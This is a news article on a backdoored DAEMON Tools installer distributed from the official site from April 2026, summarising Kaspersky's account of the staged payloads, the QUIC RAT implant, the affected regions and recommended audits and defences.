Security researchers recently disclosed that the widely used virtual optical drive software DAEMON Tools has suffered a serious supply chain attack. Its official installer has been implanted with a backdoor since early April 2026 and distributed through formal channels, affecting thousands of devices around the world. According to the investigation results released by Kaspersky, the attackers invaded the legitimate installation package and injected malicious code into the officially digitally signed binary file, allowing the malicious program to be delivered disguised as a trusted software update.

Investigation shows that this round of attacks began on April 8, 2026, with multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) was "poisoned" and the tampered installation program was hosted directly on the official website of the software and signed with a valid digital certificate of the developer AVB Disc Soft, which greatly increased the probability of users mistrusting and being tricked. Researchers pointed out that as of early May, the attack was still ongoing and the corresponding malicious infrastructure was still active.

In this incident, multiple core executable files such as DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe were modified and hidden backdoor logic was added. Once the software is installed, these components run automatically at system boot and establish communication with external command and control (C2) servers. The attacker also registered and activated a domain name that was very similar to the official DAEMON Tools site name to disguise malicious traffic as normal access behavior; the domain name was only registered a few days before the attack started, showing that the attack was carefully premeditated and planned.

From the perspective of the attack link, this operation showed an obvious phased structure. On most victim devices, the system first receives an information-stealing initial payload that is used to collect a variety of environmental data including MAC address, host name, list of installed software, running processes, network configuration, and system language/region settings. This data will be uploaded to a server controlled by the attacker, and is presumably used to profile and evaluate the value of the infected system, thereby deciding whether to launch higher-level tools in the future. Researchers also found some Chinese character strings in the payload, suggesting that the attacker may be a Chinese user, but there is no formal and clear traceability conclusion yet.

Although thousands of infection attempts have been detected across the world, only a small number of target hosts are actually delivered with the second-stage malicious program. These "priority targets" are mostly affiliated with industry organizations such as government, manufacturing, scientific research, and retail. This limited delivery and targeted overloading method shows that this is not a simple opportunistic attack, but closer to a targeted action with the intention of intelligence collection or strategic penetration.

Among the confirmed second-stage tools, researchers found a minimalist backdoor that can execute commands, download files, and load malicious code directly into memory to run on the victim system to reduce landing traces. In at least one successful breach, the attackers also deployed an advanced implant called QUIC RAT. This malicious program supports multiple communication protocols such as HTTP, TCP, DNS, QUIC, etc., and can inject its own malicious code into legitimate processes such as notepad.exe, thereby further concealing its activity tracks.

Telemetry data shows that related infection attempts have been observed in more than 100 countries. Regions with the largest number of affected systems include Russia, Brazil, Turkey, Spain, Germany, France, Italy and China. About 10% of the affected devices belong to various organizations, and most of the rest only stay in the initial data collection stage and do not receive further second-stage payloads.

Kaspersky stated that its security products can detect and intercept this attack in multiple aspects, including identifying suspicious PowerShell-based download behaviors, malicious programs executed from temporary directories, activities that inject code into legitimate processes, and abnormal external network communication patterns. The researchers recommend that any organization that has installed DAEMON Tools after April 8, 2026, should conduct a comprehensive audit of the relevant systems, focusing on checking for abnormal PowerShell command line activities and suspicious execution triggered from the temporary directory. At the same time, organizations should prioritize the implementation of a zero-trust security architecture, limit the executable permissions of temporary directories, and improve overall security resilience through a layered defense strategy.

This DAEMON Tools supply chain incident once again shows that attackers are constantly improving their attack methods against the software supply chain, combining large-scale distribution with precise strikes, and using legal and trustworthy software as a springboard to penetrate various environments. Under this trend, even commonly used software tools that have long been regarded as "security" must be regarded as potential sources of risk, and organizations need to adopt more prudent and proactive security strategies to deal with increasingly complex supply chain threats.